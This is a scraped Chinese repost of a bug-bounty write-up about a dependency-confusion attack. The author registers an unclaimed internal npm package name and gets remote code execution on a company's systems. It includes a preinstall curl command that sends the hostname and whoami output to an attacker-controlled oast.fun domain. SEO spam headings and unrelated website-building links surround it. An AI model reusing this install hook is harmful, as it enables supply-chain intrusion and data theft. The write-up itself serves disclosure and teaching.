当前位置: 首页 > news >正文

数据库网站 建设费用买域名了怎么做网站

数据库网站 建设费用,买域名了怎么做网站,孝感注册公司,网上推广营销未经许可,不得转载。 文章目录 正文 依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包&#xf…

未经许可,不得转载。

文章目录

    • 正文

依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包,一旦企业系统从公共源解析并下载该包,恶意代码便可能被执行,进而带来安全风险,如远程代码执行(RCE)。

正文

我发现某企业的前端 JavaScript 文件引用了一个存储在/node_modules/@confidential-package-name的Node.js包。进一步查询后,我发现这个内部包尚未在npm公共注册表中注册。

我创建了一个与内部包同名的恶意npm包,并将其发布到公共npm注册表中。在该包的preinstall脚本中,我嵌入了一个简单的命令,用来在安装时自动执行:

curl — data-urlencode “info=$(hostname && whoami)” http://<attacker-controlled-domain>.oast.fun

这个脚本会将服务器的主机名和用户名发送到我控制的域。

img

包上线后,数小时至几天内就收到了来自该公司的生产环境和非生产环境的多个请求,这说明他们的系统正在下载并执行这个恶意包。

img

在收到超过150个HTTP和DNS查询后,我分析IP地址,排除了已知的爬虫流量,并通过WHOIS查询检哪些请求能够匹配企业IP或其服务提供商的IP。可以看到,我实现了RCE:

img

img

原文出处:https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

http://www.yayakq.cn/news/973033/

相关文章:

  • 一般网站开发用什么笔记本博物馆网站建设的根本意义
  • 网站建设基本要点苏州优化费用
  • 教务管理网站开发wordpress 门户网站
  • 网站关键词整体方案个人网站 外贸
  • 茶叶公司商城网站建设如何创立自己的公众号
  • 江苏专业做网站的公司哪家好网站开发与实践题库
  • c#做的网站怎么上传网站title的写法
  • 自己做个网站用什么软件好江油市建设局网站
  • 网站建设公司排名深圳比汉斯设计网站素材
  • 可以做高清思维导图的网站找商务合作的平台
  • 毕设什么类型网站容易做计算机类17个专业
  • 黄石建设网站公司山东杰瑞数字做网站
  • 商丘销售网站制作wordpress如何让一个图片跟随悬浮
  • 建网页和网站的区别傻瓜式搭建网站
  • php网站建设用什么软件贵阳网站建设三思网络
  • 长沙网站推广有哪些啊湖州住房和城乡建设局网站
  • 网站建设个人信息英文翻译常州新北区有做淘宝网站策划的吗
  • 网站设计 公司 长沙西安做seo的公司
  • 如何利用NAS做网站装修公司排名前十哪家口碑好
  • 崇明区建设镇网站网上国网app推广效果
  • 信息平台 网站的建设南坪做网站
  • 网站建设和运营的课程传统生意转型做那个网站好
  • 电子政务门户网站建设淮北招聘网淮北论坛
  • 凡科网站设计网络经营范围包括哪些
  • 基层建设网站是不是停办了wordpress修改插件
  • 南京建站公司营销培训课程视频
  • 专业seo网站优化推广排名教程网站建设与维护百度百科
  • 常用设计网站有哪些软件濮阳新闻综合频道
  • 香山网站建设一键生成网站的软件
  • wordpress调用最新评论网站排名优化技术